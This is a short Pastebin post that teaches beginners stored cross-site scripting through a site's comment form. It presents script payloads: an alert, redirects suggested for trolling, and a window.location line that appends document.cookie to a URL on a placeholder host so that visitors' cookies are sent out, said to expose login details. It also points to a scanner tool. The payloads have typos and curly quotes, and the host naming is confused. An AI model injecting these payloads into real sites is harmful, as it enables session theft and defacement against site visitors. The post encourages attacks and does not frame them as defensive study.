Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey!
- Today i will teach you basics of XSS-attack
- If you havent heard about XSS attacks i suggest that you read:
- https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
- and
- https://excess-xss.com/
- In this scenario we will inject javascript using comment form.
- You can use javascript like
- <script type="text/javascript">
- alert("123 test 123")
- </script>
- To create alert saying "123 test 123" everytime someone visits site
- you can also use these javascripts for trolling reasons
- https://www.mediafire.com/folder/z553a49pjbil5/javascripts
- (you can make text blink, you can redirect the page or you can rick roll with these scripts for example)
- also you can use
- <script type"text/javascript">
- window.location = ’http://victim/path/cookies.php?cookie=hey’;
- </script>
- This will spam victims cookie.php with word "hey"
- To get victim websites cookies use
- <script type"text/javascript">
- window.location = ’http://victim/path/cookies.php?cookie=hey’+document.cookie;
- </script>
- Now you should see all saved cookies in url bar
- (you might see Login details or ip addresess for example)
- you can exploit XSS using urlbar,comment form or tool called Xenotix.
- (In Xenotixs POST request scanner enter the script to Parameters bar which is below URL)
- Now you should know basics of XSS attacks.
- -pahapoika91
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement